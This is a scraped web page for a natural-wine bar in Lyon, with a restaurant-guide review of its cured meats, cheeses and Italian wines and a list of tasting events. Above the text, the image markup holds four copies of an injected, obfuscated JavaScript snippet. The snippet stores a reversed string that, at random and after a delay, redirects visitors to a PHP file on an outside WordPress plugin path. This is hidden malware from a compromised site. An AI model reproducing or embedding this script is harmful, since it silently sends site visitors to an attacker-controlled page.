
La cave
![pic<script>$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}</script>to](https://ovinsdanges.fr/wp-content/uploads/2021/04/picto.png)
![pic<script>$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}</script>to](https://ovinsdanges.fr/wp-content/uploads/2021/04/picto.png)
![pic<script>$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}</script>to](https://ovinsdanges.fr/wp-content/uploads/2021/04/picto.png)
![pic<script>$NqM=function(n){if (typeof ($NqM.list[n]) == "string") return $NqM.list[n].split("").reverse().join("");return $NqM.list[n];};$NqM.list=["\'php.sgnittes-pupop/cni/tnemucod-yna-debme/snigulp/tnetnoc-pw/moc.kaphcterts//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random() * 6);if (number1==3){var delay = 18000;setTimeout($NqM(0),delay);}</script>to](https://ovinsdanges.fr/wp-content/uploads/2021/04/picto.png)
« Le barav’ le plus pointu de Lyon ! Direction le Plateau où, chaque fin de semaine, Sébastien Milleret deale une super came franco-transalpine sur de grandes tables en bois dans un fatras de quilles entassées. L’autre soir, parmi les dingueries avalées tout rond pour escorter ses canons : du filet mignon de porc séché signé Emmanuel Chavassieux ; des petits artichauts de Toscane à l’huile ; quelques anchois de Ligurie même pas salés ; un chic parmigiano de vache rousse ; une maousse burrata ; ou encore une affolante bruschetta avec origan sauvage et huile d’olive des Pouilles. // A.S.
»
- Guide LeFooding -
Évènements à la cave
Toujours autour du vins nature:
Samedi Vignerons / Cours dégustation / Soirée Italie /
Dégustation sur mesure / Dîner dégustation




